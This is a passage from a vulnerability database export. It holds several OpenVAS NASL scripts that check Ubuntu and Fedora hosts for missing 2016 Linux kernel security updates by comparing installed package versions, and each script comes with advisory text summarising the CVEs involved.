"CVE-2015-8767", "CVE-2015-7566", "CVE-2016-3135", "CVE-2016-3134"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842698", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-raspi2 USN-2930-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842698\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-17 05:11:14 +0100 (Thu, 17 Mar 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2016-3135\", \"CVE-2015-7566\", \"CVE-2015-8767\",\n\t\t\"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-raspi2 USN-2930-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-raspi2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ben Hawkes discovered that the Linux\n netfilter implementation did not correctly perform validation when handling\n IPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary\n code with administrative privileges. (CVE-2016-3134)\n\n Ben Hawkes discovered an integer overflow in the Linux netfilter\n implementation. On systems running 32 bit kernels, a local unprivileged\n attacker could use this to cause a denial of service (system crash) or\n possibly execute arbitrary code with administrative privileges.\n (CVE-2016-3135)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n It was discovered that a race condition existed when handling heartbeat-\n timeout events in the SCTP implementation of the Linux kernel. A remote\n attacker could use this to cause a denial of service. (CVE-2015-8767)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n Andrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\n performed a double-free. A local attacker with physical access could use\n this to cause a denial of service (system crash) or possibly execute\n arbitrary code with administrative privileges. (CVE-2016-2384)\n\n Ralf Spenneberg discovered that the USB driver for Treo devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2016-2782)\");\n script_tag(name:\"affected\", value:\"linux-raspi2 on Ubuntu 15.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2930-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2930-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU15\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-1027-raspi2\", ver:\"4.2.0-1027.35\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:21", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-wily USN-2930-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2782", "CVE-2016-0723", "CVE-2015-8767", "CVE-2015-7566", "CVE-2016-3135", "CVE-2016-3134"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842693", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842693", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-wily USN-2930-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842693\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-15 06:37:05 +0100 (Tue, 15 Mar 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2016-3135\", \"CVE-2015-7566\", \"CVE-2015-8767\",\n \t\t\"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-wily USN-2930-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-wily'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ben Hawkes discovered that the Linux\n netfilter implementation did not correctly perform validation when handling\n IPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges. (CVE-2016-3134)\n\n Ben Hawkes discovered an integer overflow in the Linux netfilter\n implementation. On systems running 32 bit kernels, a local unprivileged\n attacker could use this to cause a denial of service (system crash) or\n possibly execute arbitrary code with administrative privileges.\n (CVE-2016-3135)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n It was discovered that a race condition existed when handling heartbeat-\n timeout events in the SCTP implementation of the Linux kernel. A remote\n attacker could use this to cause a denial of service. (CVE-2015-8767)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n Andrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\n performed a double-free. A local attacker with physical access could use\n this to cause a denial of service (system crash) or possibly execute\n arbitrary code with administrative privileges. (CVE-2016-2384)\n\n Ralf Spenneberg discovered that the USB driver for Treo devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2016-2782)\");\n script_tag(name:\"affected\", value:\"linux-lts-wily on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2930-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2930-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-generic\", ver:\"4.2.0-34.39~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-generic-lpae\", ver:\"4.2.0-34.39~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-lowlatency\", ver:\"4.2.0-34.39~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc-e500mc\", ver:\"4.2.0-34.39~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc-smp\", ver:\"4.2.0-34.39~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc64-emb\", ver:\"4.2.0-34.39~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-34-powerpc64-smp\", ver:\"4.2.0-34.39~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:35", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-04-07T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-utopic USN-2948-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2782", "CVE-2016-2847", "CVE-2016-0723", "CVE-2016-2085", "CVE-2015-8812", "CVE-2016-2550", "CVE-2015-7833", "CVE-2015-7566"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842713", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842713", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-utopic USN-2948-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842713\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-04-07 05:01:24 +0200 (Thu, 07 Apr 2016)\");\n script_cve_id(\"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2015-8812\", \"CVE-2016-0723\",\n \"CVE-2016-2085\", \"CVE-2016-2550\", \"CVE-2016-2782\", \"CVE-2016-2847\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-utopic USN-2948-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-utopic'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ralf Spenneberg discovered that the USB\n driver for Clie devices in the Linux kernel did not properly sanity check\n the endpoints reported by the device. An attacker with physical access could\n cause a denial of service (system crash). (CVE-2015-7566)\n\n Ralf Spenneberg discovered that the usbvision driver in the Linux kernel\n did not properly sanity check the interfaces and endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7833)\n\n Venkatesh Pottem discovered a use-after-free vulnerability in the Linux\n kernel's CXGB3 driver. A local attacker could use this to cause a denial of\n service (system crash) or possibly execute arbitrary code. (CVE-2015-8812)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n Xiaofei Rex Guo discovered a timing side channel vulnerability in the Linux\n Extended Verification Module (EVM). An attacker could use this to affect\n system integrity. (CVE-2016-2085)\n\n David Herrmann discovered that the Linux kernel incorrectly accounted file\n descriptors to the original opener for in-flight file descriptors sent over\n a unix domain socket. A local attacker could use this to cause a denial of\n service (resource exhaustion). (CVE-2016-2550)\n\n Ralf Spenneberg discovered that the USB driver for Treo devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2016-2782)\n\n It was discovered that the Linux kernel did not enforce limits on the\n amount of data allocated to buffer pipes. A local attacker could use this\n to cause a denial of service (resource exhaustion). (CVE-2016-2847)\");\n script_tag(name:\"affected\", value:\"linux-lts-utopic on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2948-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2948-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-69-generic\", ver:\"3.16.0-69.89~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-69-generic-lpae\", ver:\"3.16.0-69.89~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-69-lowlatency\", ver:\"3.16.0-69.89~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-69-powerpc-e500mc\", ver:\"3.16.0-69.89~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-69-powerpc-smp\", ver:\"3.16.0-69.89~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-69-powerpc64-emb\", ver:\"3.16.0-69.89~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-69-powerpc64-smp\", ver:\"3.16.0-69.89~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:35", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-02-05T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-5", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8787", "CVE-2016-0723", "CVE-2015-7513", "CVE-2016-0728", "CVE-2015-8767", "CVE-2013-4312", "CVE-2015-7566", "CVE-2015-8575", "CVE-2015-8569", "CVE-2015-8709"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310807219", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807219", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807219\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-05 13:14:35 +0530 (Fri, 05 Feb 2016)\");\n\n script_cve_id(\"CVE-2013-4312\", \"CVE-2016-0723\", \"CVE-2015-8787\", \"CVE-2015-8569\",\n \"CVE-2015-8575\", \"CVE-2015-8709\", \"CVE-2015-7513\", \"CVE-2015-7566\",\n \"CVE-2015-8767\", \"CVE-2016-0728\");\n\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-5\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-February/176484.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.3.4~200.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:38", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux USN-2929-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2782", "CVE-2016-2543", "CVE-2016-2548", "CVE-2016-0723", "CVE-2016-2547", "CVE-2016-2544", "CVE-2016-2545", "CVE-2015-7833", "CVE-2013-4312", "CVE-2016-2546", "CVE-2015-7566", "CVE-2016-2549", "CVE-2016-3134"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842692", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842692", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-2929-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842692\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-15 06:36:52 +0100 (Tue, 15 Mar 2016)\");\n script_cve_id(\"CVE-2016-3134\", \"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-7833\",\n\t\t\"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\",\n\t\t\"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\",\n\t\t\"CVE-2016-2549\", \"CVE-2016-2782\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-2929-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Ben Hawkes discovered that the Linux\n netfilter implementation did not correctly perform validation when handling\n IPT_SO_SET_REPLACE events. A local unprivileged attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges. (CVE-2016-3134)\n\n It was discovered that the Linux kernel did not properly enforce rlimits\n for file descriptors sent over UNIX domain sockets. A local attacker could\n use this to cause a denial of service. (CVE-2013-4312)\n\n Ralf Spenneberg discovered that the USB driver for Clie devices in the\n Linux kernel did not properly sanity check the endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7566)\n\n Ralf Spenneberg discovered that the usbvision driver in the Linux kernel\n did not properly sanity check the interfaces and endpoints reported by the\n device. An attacker with physical access could cause a denial of service\n (system crash). (CVE-2015-7833)\n\n It was discovered that a race condition existed in the ioctl handler for\n the TTY driver in the Linux kernel. A local attacker could use this to\n cause a denial of service (system crash) or expose sensitive information.\n (CVE-2016-0723)\n\n Andrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\n performed a double-free. A local attacker with physical access could use\n this to cause a denial of service (system crash) or possibly execute\n arbitrary code with administrative privileges. (CVE-2016-2384)\n\n Dmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA)\n framework did not verify that a FIFO was attached to a client before\n attempting to clear it. A local attacker could use this to cause a denial\n of service (system crash). (CVE-2016-2543)\n\n Dmitry Vyukov discovered that a race condition existed in the Advanced\n Linux Sound Architecture (ALSA) framework between timer setup and closing\n of the client, resulting in a use-after-free. A local attacker could use\n this to cause a denial of service. (CVE-2016-2544)\n\n Dmitry Vyukov discovered a race condition in the timer handling\n implementation of the Advanced Linux Sound Architecture (ALSA) framework,\n resulting in a use-after-free. A local attacker could use this to cause a\n denial of service (system crash). (CVE-2016-2545)\n\n Dmitry Vyukov discovered race conditions in the Advanced Linux Sound\n Architecture (ALSA) framework's timer ioctls leading to a use-after-free. A\n local attacker could use this to cause a denial of service (system crash)\n or possibly execute arbitrary code. (CVE-2016-2546)\n\n Dmitry Vyukov discovered that the Adva ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2929-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2929-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-generic\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-generic-lpae\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-lowlatency\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-powerpc-e500\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-powerpc-e500mc\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-powerpc-smp\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-powerpc64-emb\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-83-powerpc64-smp\", ver:\"3.13.0-83.127\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:21", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-trusty USN-2929-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2782", "CVE-2016-2543", "CVE-2016-2548", "CVE-2016-0723", "CVE-2016-2547", "CVE-2016-2544", "CVE-2016-2545", "CVE-2015-7833", "CVE-2013-4312", "CVE-2016-2546", "CVE-2015-7566", "CVE-2016-2549", 